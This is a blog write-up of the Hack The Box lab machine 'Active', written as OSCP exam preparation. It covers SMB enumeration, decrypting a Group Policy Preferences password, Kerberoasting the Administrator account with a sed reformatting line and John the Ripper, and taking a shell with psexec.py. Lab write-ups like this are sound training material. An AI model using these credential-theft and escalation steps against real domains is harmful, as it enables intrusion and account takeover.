Road to OSCP: HTB Series: Active Writeup
Continuing on my road to OSCP certification, I am in the midst of preparation for the exams in January. Part of my preparation is to take on the retired machines available in Hack in The Box (HTB) platform. This platform is a great platform for practicing and learning new penetration testing skills as well as taking on the challenge of “capturing the flag” on their machines.
In this HTB series, I will be sharing my write-ups on all the retired machines that I have attempted. If you are wondering, “How does he know which machine to do to prepare for OSCP?” Well, I am using TjNull list of OSCP-like boxes in HTB which can be found here
This box is pretty cool and I immediately wanted to do a write up right after I finish this machine.
What is interesting about this box is probably more of a personal challenge. I am not usually the most comfortable when it comes to penetrating a windows OS machine and especially enumerating the SMB service and figuring out the right file or location to find the files I need. This machine really challenged me in that aspect and also to put into practice kerberoasting which I also learnt in OSCP.
As per usual, I begin my enumeration with AutoRecon which is developed and scripted by Tib3rius. Check out his course on his twitter account for voucher codes on his privilege escalation course as well! Now looking at the screenshots of what I got:
This is one of the reasons why I am not usually fond of Windows OS. Many RPC ports and sometimes ports that I do not have very strong knowledge of. However, looking at this, some of the things we can tell is that this machine is operating with Active Directory and there is Kerberos service on this machine as well. UDP Port 53 is open on this machine which also might indicate and give light that this machine might be a Domain Controller.
smbmap, AutoRecon also presented several interesting findings within the SMB Service. We see that as an anonymous user, we have Read access to the
smbmap also reveals the contents within the share that is readable:
We see there are a couple of folders and files that we can look at. So let’s go in with
smbclient to manually enumerate the share:
As we enumerate through the share, we come across several interesting files like
GPT.INI GPE.INI GPTTmpl.inf Groups.xml . Googling more about these files give us the readings below:
Architecture of Windows Group Policy for Windows Server 2008 and Windows Vista
There have been some radical changes to the underlying implementation of Group Policy with Windows Vista and Windows…
We then google more about
Groups.xml and we find that the
cpassword found in the file can be cracked to obtain a password for the user in the
Groups.xml file. Using the following link as reference:
Credential Dumping: Group Policy Preferences (GPP)
People might be aware of "Group Policy Preferences" in Windows Server 2008 that allows system administrators to set up…
We then use the
gpp-decrypt in our Kali:
We then obtained the password for
Using the credentials we obtained, we use it to enumerate with
Now, we have read access to more shares! In the course of our enumeration with
smbmap , we will find
While it is tempting to just pull and read it, I really do not want to do that because in OSCP, it is a requirement to obtain shell when we read the flags. So let’s keep to that practice for the sake of OSCP exam preparation.
Now we need to find a way to escalate from here! If we can gain write access to shares, we will be able to use
psexec.py from Impacket.
Now that we have password to a user on this Machine. Let’s try to see if we can get password of
Administrator . To do this, since we know this machine uses Kerberos as authentication method, we can try to obtain the Service Principal (SPN) values. In doing so, we might obtain the ticket that will allow us to carry out Kerberoasting to obtain a password to an account with higher privileges.
We obtain a ticket of the Administrator. Let’s transfer this to an output file:
Then, we want to clean up and make sure that the text file is ready for use for John The Ripper to crack the ticket:
cat JtR | sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/'
Then using the
rockyou.txt wordlist and John the Ripper:
Now we know the password of the
Using smbmap to check our permissions on the share:
We have read and write access! This means we can use
psexec.py to obtain a remote shell on the machine:
We have successfully gain a shell with Administrator privileges. Grabbing the
I learnt more about the Windows Feature of Group Policy Preferences and how it is used in Windows Server 2008. I also saw how when the preference items are not secured properly, passwords can easily be stolen as in the case of how we obtained password as we could read the
Groups.xml file which contains the
cpassword that can be decrypted to obtain plaintext passwords. I also had a chance to practice Kerberoasting and recalled about the use cases of
psexec to obtain shell. Overall, I really enjoy this machine!
Thank you for reading! And like always if you enjoy this write-ups, subscribe to my publications or follow me on twitter @lojomojo96 and hit me up with a DM! It will really encourage me to write and share even as I prepare for my OSCP Certification. Of course, if there are points to improve upon my own methodology, do let me know too! You can also find me on LinkedIn as well!